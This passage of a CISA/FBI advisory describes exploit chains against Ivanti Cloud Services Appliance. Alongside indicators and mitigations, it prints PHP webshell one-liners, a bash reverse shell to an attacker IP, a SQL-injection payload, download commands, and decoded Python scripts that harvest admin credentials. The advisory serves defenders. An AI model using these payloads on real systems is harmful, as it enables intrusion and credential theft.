SQL statements.[1] CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1] According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog. According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures. Exploit Chain 1 The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts. In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable. After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003]. In one confirmed compromise, the threat actors tried to create webshells using two different paths: echo “<?php system(@\$_REQUEST[‘a’]);”>/opt/ivanti/csa/broker/webroot/client/help.php echo “<?php system(‘/bin/sudo ‘. @\$_REQUEST[‘a’]);” > /opt/landesk/broker/webroot/gsb/help.php In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1. In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used. Lateral Movement In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002]. Exploit Chain 2 In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access. After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES (”’echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k”’, NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table. After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful. Detection of Activity According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions. Victim Organization 1 The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement. Victim Organization 2 This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement. Victim Organization 3 This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity. Indicators of Compromise See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA. Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors. Table 1: IP Address Used for Credential Theft, September 2024 File Name IP Address Description “/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages “/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz “/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53   “/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz “/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024 File Name IP Address Description   149.154.167[.]41     95.161.76[.]100   hxxps://file.io/E50vtqmJP5aa     hxxps://file.io/RBKuU8gicWt     hxxps://file.io/frdZ9L18R7Nx     hxxp://ip.sb     hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis       142.171.217[.]195     108.174.199[.]200     206.189.156[.]69     108.174.199[.]200/Xa27efd2.tmp     142.171.217[.]195   Table 3: Additional IOCs Derived from Incident Response, September 2024 Type IOC Description Ipv4 107.173.89[.]16   Ipv4 38.207.159[.]76   Ipv4 142.171.217[.]195   Ipv4 154.64.226[.]166   Ipv4 156.234.193[.]18   Ipv4 216.131.75[.]53   Ipv4 205.169.39[.]11   Ipv4 23.236.66[.]97   Ipv4 149.154.176[.]41   Ipv4 95.161.76[.]100   Ipv4 142.171.217[.]195   Ipv4 108.174.199[.]200   Ipv4 206.189.156[.]69   Ipv4 142.171.217[.]195   Ipv4 67.217.228[.]83   Ipv4 203.160.72[.]174   Ipv4 142.11.217[.]3   Ipv4 104.168.133[.]228   Ipv4 64.176.49[.]160   Ipv4 45.141.215[.]17   Ipv4 142.171.217[.]195   Ipv4 98.101.25[.]30   Ipv4 216.131.75[.]53   Ipv4 134.195.90[.]71   Ipv4 23.236.66[.]97   Hash a50660fb31df96b3328640fdfbeea755   Hash 53c5b7d124f13039eb62409e1ec2089d   Hash 698a752ec1ca43237cb1dc791700afde   Hash aa69300617faab4eb39b789ebfeb5abe   Hash c2becc553b96ba27d60265d07ec3bd6c   Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php Hash e35cf026057a3729387b7ecfb213ae 62a611f0f1a418876b11c9df3b56885bed /tmp/brokerdebug Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php Hash 1B20E9310CA815F9E2BD366FB94E147F /sbin/systemd   Configuration file at /WpService.conf Hash 30f57e14596f1bcad7cc4284d1af4684 /sbin/systemd  Configuration file at /WpService.conf URL hxxps://file.io/E50vtqmJP5aa   URL hxxps://file.io/RBKuU8gicWt   URL hxxps://file.io/frdZ9L18R7Nx   URL hxxp://ip.sb   URL hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis   URL 108.174.199.200/Xa27efd2.tmp   URL 45.33.101.53/log   URL 45.33.101.53/log2   URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun   URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun   domain gg.oyr2ohrm.eyes[.]sh   domain ggg.oyr2ohrm.eyes[.]sh   domain gggg.oyr2ohrm.eyes[.]sh   domain txt.xj[.]hk   domain book.hacktricks[.]xyz   host sh -c setsid /dev/shm/redis &   host sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2   host sh -c mv /dev/shm/redis2 /dev/shm/redis   host sh -c rm /dev/shm/*   host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis   host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip host d13f71e51b38ffef6b9dc8efbed27615 Log.log host d88bfac2b43509abdc70308bef75e2a6 Log.exe host R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) R.exe host ae51c891d2e895b5ca919d14edd42c26 CAService.exe host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp host MD5: Unknown Wi.bat host MD5: Unknown dCUgGXfm.tmp host MD5: Unknown DijZViHC.tmp /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf   /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini   /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock –localtime –systohc    /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool –fullList   Ipv4 142.171.217[.]195   Ipv4 107.173.89[.]16   Ipv4 192.42.116[.]210   Ipv4 82.197.182[.]161   Ipv4 154.213.185[.]230   Ipv4 216.131.75[.]53   Ipv4 23.236.66[.]97   Ipv4 208.105.190[.]170   Ipv4 136.144.17[.]145   Ipv4 136.144.17[.]133   Ipv4 216.73.162[.]56   Ipv4 104.28.240[.]123   Ipv4 163.5.171[.]49   Ipv4 89.187.178[.]179   Ipv4 163.5.171[.]49   Ipv4 203.160.86[.]69   Ipv4 185.220.69[.]83   Ipv4 185.199.103[.]196   Ipv4 188.172.229[.]15   Ipv4 155.138.215[.]144   Ipv4 64.176.49[.]160   Ipv4 185.40.4[.]38   Ipv4 216.131[.]75.53   Ipv4 185.40.4[.]95   MITRE ATT&CK Tactics and Techniques See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 4: Reconnaissance Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities. Table 5: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications. Table 6: Execution Technique Title ID Use Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries. Table 7: Persistence Technique Title ID Use Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks. Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence. Table 8: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server. Table 9: Defense Evasion Technique Title ID Use Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system. Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file. Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation. Table 10: Credential Access Technique Title ID Use Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access. Table 11: Lateral Movement Technique Title ID Use Exploitation of Remove Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems. Table 12: Command and Control Technique Title ID Use Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance. Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens. Table 13: Exfiltration Technique Title ID Use Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use. Incident Response If compromise is detected, the authoring agencies recommend that organizations: Quarantine or take offline potentially affected hosts. Reimage compromised hosts. Provision new account credentials. For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). Mitigations CISA and FBI recommend organizations:  Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support. Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity. Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Secure remote access tools by: Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec. Follow best cybersecurity practices in your production and enterprise environments,including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF). Validate Security Controls In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 4 through Table 13). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. References Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381) Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190) Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963) Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA Contact Information Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI. Version History January 22, 2025: Initial version.January 31, 2025: Removed IOCs. Appendix A: Encoded and Decoded Scripts Decoded Python Scripts {import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin’\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“php\w{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)} {import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’service'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’service’\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“php\w{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)} import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“php\w{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“php\w{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) {import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0,attempts=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) with open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]    p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip()   v = p.split(‘:’)   k = os.popen(‘base 64 -w0 root/.certs/{}.key’.format(v[1])).read()   set_msg(dbpwd, “PASSWORD”, p+’||’+k)   time.sleep(30)   set_msg(dbpwd)} {import os, re, base64, time def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) os.chdir(“/tmp”)d = “/backups”try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))   if r:       p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)       os.system(“tar zxvf {}”.format(r))       while True:           for f in os.listdir(‘.’):               if re.match(“php\w{6}”, f):                   os.chmod(f, 0o777)                   m = os.popen(“./{} ‘{}’ ‘{}’ ‘{}’ root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()                   if m:                       set_msg(dbpwd, “PASSWORD”, m)                       time.sleep(30)                       set_msg(dbpwd)                       exit()   else:       set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)} {import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“php\w{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)} Decoded datetime.php ‘timezone’ Exploit base64 Scripts {Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)} {Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U 